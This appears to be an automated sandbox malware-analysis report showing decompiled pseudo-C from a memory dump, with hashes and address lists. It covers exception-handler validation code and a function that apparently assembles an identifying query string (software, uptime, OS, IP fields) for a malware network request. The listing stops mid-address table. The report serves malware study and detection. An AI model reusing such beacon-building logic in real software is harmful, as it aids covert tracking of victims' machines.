0x00fab36f
0x00fab36f
0x00fab370
0x00fab370
0x00000000
0x00fab358
0x00fab358
0x00fab358
0x00fab361
0x00fab362
0x00fab364
0x00fab366
0x00fab366
0x00000000
0x00fab358
0x00fab356
0x00fab332
0x00fab339
0x00fab339
0x00fab33b
0x00000000
0x00000000
0x00fab33d
0x00fab33e
0x00fab341
0x00fab343
0x00000000
0x00000000
0x00000000
0x00fab343
0x00000000
0x00fab339
0x00fab2bc
0x00fab2bf
0x00fab2c4
0x00000000
0x00000000
0x00fab2cd
0x00fab2cf
0x00fab2d5
0x00000000
0x00000000
0x00fab2db
0x00fab2e1
0x00000000
0x00000000
0x00fab2e7
0x00fab2e9
0x00fab2f2
0x00fab2f6
0x00000000
0x00000000
0x00fab2fc
0x00fab2ff
0x00fab301
0x00000000
0x00000000
0x00fab308
0x00fab30a
0x00000000
0x00000000
0x00fab30c
0x00fab310
0x00000000
0x00000000
0x00000000
0x00fab310
0x00000000
0x00000000
0x00000000
0x00fab1fb
0x00fab1fb
0x00fab1fb
0x00fab202
0x00000000
0x00000000
0x00fab204
0x00fab205
0x00fab207
0x00000000
0x00000000
0x00000000
0x00fab207
0x00fab22f
0x00fab231
0x00000000
0x00000000
0x00fab241
0x00fab243
0x00fab245
0x00000000
0x00000000
0x00fab24b
0x00fab252
0x00fab27e
0x00fab27e
0x00fab280
0x00fab282
0x00fab296
0x00fab298
0x00000000
0x00000000
0x00000000
0x00000000
0x00fab284
0x00fab284
0x00fab284
0x00fab28d
0x00fab28e
0x00fab290
0x00fab292
0x00fab292
0x00000000
0x00fab284
0x00fab254
0x00fab254
0x00fab257
0x00fab259
0x00fab26b
0x00fab26b
0x00fab26e
0x00fab270
0x00fab270
0x00fab271
0x00fab271
0x00fab277
0x00fab277
0x00000000
0x00000000
0x00000000
0x00000000
0x00fab25b
0x00fab25b
0x00fab25b
0x00fab262
0x00000000
0x00000000
0x00fab264
0x00fab264
0x00fab265
0x00000000
0x00000000
0x00000000
0x00fab265
0x00fab267
0x00fab269
0x00fab27c
0x00000000
0x00000000
0x00000000
0x00fab27c
0x00000000
0x00fab269
0x00fab1db
0x00fab1de
0x00fab1e1
0x00000000
0x00000000
0x00fab1e3
0x00fab1e5
0x00000000
0x00000000
0x00000000
0x00fab1e5
0x00fab1aa
0x00fab1ac
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00FAB21A

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 5d2eee7bf11a2412b52b7cb9b72acbbc0cf820f4d5b1bbfa0392bb3c2f183acc
Instruction ID: 37ac10e7dc0f72fbe7b2591689334624c1388c3fb115da31e0db26fc93ae3f28
Opcode Fuzzy Hash: 5d2eee7bf11a2412b52b7cb9b72acbbc0cf820f4d5b1bbfa0392bb3c2f183acc
Instruction Fuzzy Hash: 8961BFB1A006069BDF1ACF69D89076973E5EB87324F24852AD806C7692E731EC81F650

Uniqueness

Uniqueness Score: -1.00%

Function 100023C5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100023C5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10004178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x100041c0 = 1;
										__eflags =  *0x100041c0;
										if( *0x100041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x10004178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x100041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10004178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1000417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x100041c0 = 1;
							__eflags =  *0x100041c0;
							if( *0x100041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x100041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10004178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x100023cf
0x100023d2
0x100023d8
0x100023f6
0x00000000
0x100023f6
0x100023e0
0x100023e9
0x100023ef
0x100023fe
0x10002401
0x10002404
0x1000240e
0x1000240e
0x10002410
0x10002413
0x10002415
0x10002415
0x10002417
0x1000241a
0x00000000
0x00000000
0x1000241c
0x1000241e
0x10002484
0x10002484
0x100025e2
0x00000000
0x100025e2
0x10002420
0x10002420
0x10002424
0x10002426
0x10002426
0x10002426
0x10002426
0x10002429
0x1000242a
0x1000242d
0x1000242d
0x10002431
0x10002435
0x10002443
0x10002443
0x1000244b
0x10002451
0x10002453
0x10002455
0x10002465
0x10002472
0x10002476
0x1000247b
0x1000247d
0x100024fb
0x100024fb
0x1000247f
0x1000247f
0x1000247f
0x100024fd
0x100024ff
0x100025e0
0x100025e0
0x00000000
0x10002505
0x10002505
0x1000250c
0x00000000
0x00000000
0x10002512
0x10002516
0x10002572
0x10002574
0x1000257c
0x1000257e
0x10002580
0x00000000
0x00000000
0x10002582
0x10002588
0x1000258a
0x1000258c
0x100025a1
0x100025a1
0x100025a3
0x100025d2
0x100025d9
0x00000000
0x100025d9
0x100025a7
0x100025a8
0x100025aa
0x100025ac
0x100025ac
0x100025ae
0x100025b0
0x100025b2
0x100025c6
0x100025c6
0x100025c9
0x100025cb
0x100025cb
0x100025cc
0x100025cc
0x00000000
0x100025b4
0x100025b4
0x100025b4
0x100025bd
0x100025be
0x100025c0
0x100025c2
0x100025c2
0x00000000
0x100025b4
0x100025b2
0x1000258e
0x10002595
0x10002595
0x10002597
0x00000000
0x00000000
0x10002599
0x1000259a
0x1000259d
0x1000259f
0x00000000
0x00000000
0x00000000
0x1000259f
0x00000000
0x10002595
0x10002518
0x1000251b
0x10002520
0x00000000
0x00000000
0x10002529
0x1000252b
0x10002531
0x00000000
0x00000000
0x10002537
0x1000253d
0x00000000
0x00000000
0x10002543
0x10002545
0x1000254e
0x10002552
0x00000000
0x00000000
0x10002558
0x1000255b
0x1000255d
0x00000000
0x00000000
0x10002564
0x10002566
0x00000000
0x00000000
0x10002568
0x1000256c
0x00000000
0x00000000
0x00000000
0x1000256c
0x00000000
0x00000000
0x00000000
0x10002457
0x10002457
0x10002457
0x1000245e
0x00000000
0x00000000
0x10002460
0x10002461
0x10002463
0x00000000
0x00000000
0x00000000
0x10002463
0x1000248b
0x1000248d
0x00000000
0x00000000
0x1000249d
0x1000249f
0x100024a1
0x00000000
0x00000000
0x100024a7
0x100024ae
0x100024da
0x100024da
0x100024dc
0x100024de
0x100024f2
0x100024f4
0x00000000
0x00000000
0x00000000
0x00000000
0x100024e0
0x100024e0
0x100024e0
0x100024e9
0x100024ea
0x100024ec
0x100024ee
0x100024ee
0x00000000
0x100024e0
0x100024b0
0x100024b3
0x100024b5
0x100024c7
0x100024c7
0x100024ca
0x100024cc
0x100024cc
0x100024cd
0x100024cd
0x100024d3
0x00000000
0x00000000
0x00000000
0x00000000
0x100024b7
0x100024b7
0x100024b7
0x100024be
0x00000000
0x00000000
0x100024c0
0x100024c0
0x100024c1
0x00000000
0x00000000
0x00000000
0x100024c1
0x100024c3
0x100024c5
0x100024d8
0x00000000
0x00000000
0x00000000
0x100024d8
0x00000000
0x100024c5
0x10002437
0x1000243a
0x1000243d
0x00000000
0x00000000
0x1000243f
0x10002441
0x00000000
0x00000000
0x00000000
0x10002441
0x10002406
0x10002408
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002476

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 75796e37ffc40df8b07d760eb0f82abd4fd6d8346141c8c85dd3289551cfb3a3
Instruction ID: 565bfe824334cf735712f2556b3512e5c3dd88f08f5da091b28bd90529fb40d8
Opcode Fuzzy Hash: 75796e37ffc40df8b07d760eb0f82abd4fd6d8346141c8c85dd3289551cfb3a3
Instruction Fuzzy Hash: 6861FC70A00A568FFB59CF28CCE066937E5EB893D5F228139D846C729DEB30DD82C654

Uniqueness

Uniqueness Score: -1.00%

Function 00FAAF44, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E00FAAF44(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E00FAB0AF(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E00FAB169(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E00FAB054(_t55, _t66);
										_t89 = _t66 + 0x10;
										E00FAB0AF(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E00FAB14B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x00faaf48
0x00faaf49
0x00faaf4a
0x00faaf4d
0x00faaf4f
0x00faaf52
0x00faaf53
0x00faaf55
0x00faaf56
0x00faaf57
0x00faaf5a
0x00faaf64
0x00fab015
0x00fab01c
0x00fab025
0x00faaf6a
0x00faaf6a
0x00faaf70
0x00faaf76
0x00faaf79
0x00faaf7c
0x00faaf80
0x00faaf85
0x00faaf8a
0x00fab00a
0x00000000
0x00faaf8c
0x00faaf8c
0x00faaf98
0x00faaf9a
0x00faaff5
0x00faaff5
0x00faaffb
0x00000000
0x00faaf9c
0x00faafab
0x00faafad
0x00faafae
0x00faafaf
0x00faafb2
0x00faafb2
0x00faafb4
0x00000000
0x00faafb6
0x00faafb6
0x00fab000
0x00faafb8
0x00faafb8
0x00faafbc
0x00faafc4
0x00faafc9
0x00faafce
0x00faafda
0x00faafe2
0x00faafe9
0x00faafef
0x00faaff3
0x00000000
0x00faaff3
0x00faafb6
0x00faafb4
0x00000000
0x00faaf9a
0x00fab00e
0x00fab00e
0x00fab00e
0x00faaf8a
0x00fab02a
0x00fab031

Memory Dump Source

Source File: 00000000.00000002.1203041666.0000000000FA1000.00000020.00020000.sdmp, Offset: 00FA0000, based on PE: true

Associated: 00000000.00000002.1203030409.0000000000FA0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203071554.0000000000FAC000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1203083910.0000000000FAD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1203095235.0000000000FAF000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 20ce181b5b2993cf62c550e2e59aa08f398ca564582a1cdb1d3627b52666c9c7
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 4C21A7B29002049FC714DF68CCC196BBBA5BF45360B05C158D915DB246D734F915D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 100021A4, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E100021A4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E1000230B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E100023C5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E100022B0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E1000230B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E100023A7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x100021a8
0x100021a9
0x100021aa
0x100021ad
0x100021af
0x100021b2
0x100021b3
0x100021b5
0x100021b6
0x100021b7
0x100021ba
0x100021c4
0x10002275
0x1000227c
0x10002285
0x100021ca
0x100021ca
0x100021d0
0x100021d6
0x100021d9
0x100021dc
0x100021e0
0x100021e5
0x100021ea
0x1000226a
0x00000000
0x100021ec
0x100021ec
0x100021f8
0x100021fa
0x10002255
0x10002255
0x1000225b
0x00000000
0x100021fc
0x1000220b
0x1000220d
0x1000220e
0x1000220f
0x10002212
0x10002212
0x10002214
0x00000000
0x10002216
0x10002216
0x10002260
0x10002218
0x10002218
0x1000221c
0x10002224
0x10002229
0x1000222e
0x1000223a
0x10002242
0x10002249
0x1000224f
0x10002253
0x00000000
0x10002253
0x10002216
0x10002214
0x00000000
0x100021fa
0x1000226e
0x1000226e
0x1000226e
0x100021ea
0x1000228a
0x10002291

Memory Dump Source

Source File: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1203708719.0000000010005000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 237e667de8eea833f5a963452b53f6ad9b15aba12f2c2e3f9f83011bab3cc983
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 5321B676904204ABDB10DFA8CCC09ABF7A5FF49390B468168ED559B249D730FA15C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 00FA3C32, Relevance: 34.7, APIs: 23, Instructions: 223
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00FA3C32(long __eax, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v44;
				void* __ecx;
				void* __edi;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t39;
				intOrPtr _t40;
				int _t43;
				void* _t44;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t63;
				intOrPtr _t67;
				intOrPtr* _t69;
				intOrPtr _t75;
				intOrPtr _t81;
				intOrPtr _t84;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t91;
				int _t94;
				intOrPtr _t95;
				int _t98;
				void* _t101;
				void* _t102;
				void* _t106;
				intOrPtr _t108;
				long _t110;
				intOrPtr _t111;
				intOrPtr* _t112;
				long _t113;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;
				void* _t123;
				void* _t124;

				_t106 = __edx;
				_t113 = __eax;
				_v8 = 8;
				_t120 = RtlAllocateHeap( *0xfad1f0, 0, 0x800);
				if(_t120 != 0) {
					if(_t113 == 0) {
						_t113 = GetTickCount();
					}
					_t32 =  *0xfad018; // 0x8a48e7c8
					asm("bswap eax");
					_t33 =  *0xfad014; // 0x5cb11ae7
					asm("bswap eax");
					_t34 =  *0xfad010; // 0x15dc9586
					asm("bswap eax");
					_t35 =  *0xfad00c; // 0x67522d90
					asm("bswap eax");
					_t36 =  *0xfad230; // 0x2a9a5a8
					_t2 = _t36 + 0xfae622; // 0x74666f73
					_t114 = wsprintfA(_t120, _t2, 2, 0x3d13b, _t35, _t34, _t33, _t32,  *0xfad02c,  *0xfad004, _t113);
					_t39 = E00FA7C63();
					_t40 =  *0xfad230; // 0x2a9a5a8
					_t3 = _t40 + 0xfae662; // 0x74707526
					_t43 = wsprintfA(_t114 + _t120, _t3, _t39);
					_t123 = _t121 + 0x38;
					_t115 = _t114 + _t43;
					if(_a12 != 0) {
						_t95 =  *0xfad230; // 0x2a9a5a8
						_t7 = _t95 + 0xfae66d; // 0x732526
						_t98 = wsprintfA(_t115 + _t120, _t7, _a12);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t98;
					}
					_t44 = E00FA4930(_t102);
					_t45 =  *0xfad230; // 0x2a9a5a8
					_t9 = _t45 + 0xfae38a; // 0x6d697426
					_t116 = _t115 + wsprintfA(_t115 + _t120, _t9, _t44, _t106);
					_t49 =  *0xfad230; // 0x2a9a5a8
					_t11 = _t49 + 0xfae33b; // 0x74636126
					_t117 = _t116 + wsprintfA(_t116 + _t120, _t11, 0);
					_t53 =  *0xfad284; // 0x3a495b0
					_t124 = _t123 + 0x1c;
					if(_t53 != 0) {
						_t91 =  *0xfad230; // 0x2a9a5a8
						_t13 = _t91 + 0xfae685; // 0x73797326
						_t94 = wsprintfA(_t117 + _t120, _t13, _t53);
						_t124 = _t124 + 0xc;
						_t117 = _t117 + _t94;
					}
					_t108 =  *0xfad2d4; // 0x3a49630
					_a28 = E00FA66E0(0xfad00a, _t108 + 4);
					_t56 =  *0xfad278; // 0x3a495e0
					_t110 = 0;
					if(_t56 != 0) {
						_t87 =  *0xfad230; // 0x2a9a5a8
						_t16 = _t87 + 0xfae8ea; // 0x3d736f26
						_t90 = wsprintfA(_t117 + _t120, _t16, _t56);
						_t124 = _t124 + 0xc;
						_t117 = _t117 + _t90;
					}
					_t57 =  *0xfad274; // 0x0
					if(_t57 != _t110) {
						_t84 =  *0xfad230; // 0x2a9a5a8
						_t18 = _t84 + 0xfae8c1; // 0x3d706926
						wsprintfA(_t117 + _t120, _t18, _t57);
					}
					if(_a28 != _t110) {
						_t101 = RtlAllocateHeap( *0xfad1f0, _t110, 0x800);
						if(_t101 != _t110) {
							E00FA28E3(GetTickCount());
							_t63 =  *0xfad2d4; // 0x3a49630
							__imp__(_t63 + 0x40);
							asm("lock xadd [eax], ecx");
							_t67 =  *0xfad2d4; // 0x3a49630
							__imp__(_t67 + 0x40);
							_t69 =  *0xfad2d4; // 0x3a49630
							_t118 = E00FA49EC(1, _t106, _t120,  *_t69);
							asm("lock xadd [eax], ecx");
							if(_t118 != _t110) {
								StrTrimA(_t118, 0xfac2c4);
								_t75 =  *0xfad230; // 0x2a9a5a8
								_push(_t118);
								_t20 = _t75 + 0xfae2d2; // 0x53002f
								_t111 = E00FA9FA4(_t20);
								_v8 = _t111;
								if(_t111 != 0) {
									 *_t118 = 0;
									__imp__(_t101, _a4);
									_t112 = __imp__;
									 *_t112(_t101, _t111);
									 *_t112(_t101, _t118);
									_t81 = E00FAA23C(0xffffffffffffffff, _t101, _v16, _v12);
									_v44 = _t81;
									if(_t81 != 0 && _t81 != 0x10d2) {
										E00FA54F9();
									}
									HeapFree( *0xfad1f0, 0, _v28);
								}
								HeapFree( *0xfad1f0, 0, _t118);
								_t110 = 0;
							}
							HeapFree( *0xfad1f0, _t110, _t101);
						}
						HeapFree( *0xfad1f0, _t110, _a20);
					}
					HeapFree( *0xfad1f0, _t110, _t120);
				}
				return _v16;
			}

0x00fa3c32
0x00fa3c46
0x00fa3c48
0x00fa3c56
0x00fa3c5a
0x00fa3c62
0x00fa3c6a
0x00fa3c6a
0x00fa3c6c
0x00fa3c78
0x00fa3c87
0x00fa3c8c
0x00fa3c8f
0x00fa3c94
0x00fa3c97
0x00fa3c9c
0x00fa3c9f
0x00fa3cab
0x00fa3cb8
0x00fa3cba
0x00fa3cc0
0x00fa3cc5
0x00fa3cd0
0x00fa3cd2
0x00fa3cd5
0x00fa3cdb
0x00fa3cdd
0x00fa3ce6
0x00fa3cf1
0x00fa3cf3
0x00fa3cf6
0x00fa3cf6
0x00fa3cf8
0x00fa3cff
0x00fa3d04
0x00fa3d11
0x00fa3d13
0x00fa3d18
0x00fa3d26
0x00fa3d28
0x00fa3d2d
0x00fa3d32
0x00fa3d35
0x00fa3d3a
0x00fa3d45
0x00fa3d47
0x00fa3d4a
0x00fa3d4a
0x00fa3d4c
0x00fa3d5f
0x00fa3d63
0x00fa3d68
0x00fa3d6c
0x00fa3d6f
0x00fa3d74
0x00fa3d7f
0x00fa3d81
0x00fa3d84
0x00fa3d84
0x00fa3d86
0x00fa3d8d
0x00fa3d90
0x00fa3d95
